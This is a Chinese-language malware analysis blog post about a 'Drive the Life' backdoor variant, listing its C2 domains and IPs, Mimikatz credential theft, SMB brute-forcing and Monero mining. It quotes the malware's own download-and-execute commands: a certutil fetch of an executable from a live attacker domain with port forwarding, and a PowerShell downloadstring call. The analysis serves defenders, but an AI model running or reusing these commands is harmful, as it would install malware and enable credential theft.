驱动人生安全事件分析

字节脉搏实验室

发布于 2020-11-06 11:01:11

2.7K0

发布于 2020-11-06 11:01:11

文章被收录于专栏：字节脉搏实验室字节脉搏实验室

文章源自【字节脉搏社区】-字节脉搏实验室

作者-阿盟

1. 攻击特征

1.病毒会创建计划任务持续使用PowerShell.exe下载其他恶意程序。

2.病毒运行挖矿程序占用计算机资源，影响正常使用。

3.病毒运行木马程序用于自身持久化驻留和操控计算机。

注：通过任务管理器查看CPU较高使用率和多个PowerShell.exe进程，能初步判断机器中了此木马，查看其计划任务有随机名，调用PwoerShell确定木马病毒存在。

攻击链路：

驱动人生”后门变种，从木马中提取的相关域名和ip如下：

v.beahh.com/o.beahh.com/new.beahh.com/cert.beahh.com/loop.hqo.net/w.beahh.com

C&C端ip：172.104.73.9/172.104.78.101/153.92.4.49

病毒MD5：96bdb44e072122ee05fb8e729063463c

病毒名称svchost.exe

该木马运行后会释放一个m.ps1 PowerShell运行程序，此程序会调用Mimikatz脚本，进行本机用户和密码的抓取，同时创建计划任务，每天固定时间点自动向XX.beahh.com发送http请求下载域名解析后服务器上的程序，并以HTA(内含微软某CVE漏洞的payload)运行方式执行的命令。

该木马会发送基于445端口的SMB数据包，同时具有扫描内网和外网开放445端口的ip，即便已安装永恒之蓝的补丁，也无法遏制内网传播，一旦开启了SMB服务则有可能会中毒，该木马是利用445端口进行SMB域账户爆破，该病毒实施的SMB爆破行为，是基于SMBV2协议的一种攻击方式，且木马中内置弱口令账户和密码，同通过IPC$空连接进行SMB服务的账户爆破或登陆。

该病毒获取到用户名或密码时，无论是爆破还是抓取到的用户名密码，通过IPC$登陆后，对中病毒机器执行以下命令进行远程下载执行，同时设置端口转发，将来自65532端口的流量转发到1.1.1.1地址的53端口，将来自65531端口的流量转发到1.1.1.1地址的53端口。

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

病毒同时也会创建可写文件update.exe文件。

分析update.exe如下：

该文件中发送指令通过RSA算法进行加密，获取指令后通过编码RSA公钥进行解密，最终执行远程命令。

文件中对I am the mxr report进行互斥体判断，打开互斥体，即mxr（门罗币挖矿）程序。

病毒拥有远控功能，运行后将本机的CUP型号，操作系统版本，MAC地址，ip地址，域用户名，显卡信息，挖矿线程，以及计算机参数传递给终端：

该脚本新增一个计划任务，计划每天7：00运行

C:\windows\temp\svchost.exe程序,同时向域名端发送远程下载执行命令，加密内容解密后为：

(NewObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

2.分析

文件操作

样本启动后会在“%username%\AppData\Local\Temp”目录下创建_MEI24082文件夹（文件夹后的数字24082为随机生成的），释放恶意代码执行需要的库文件。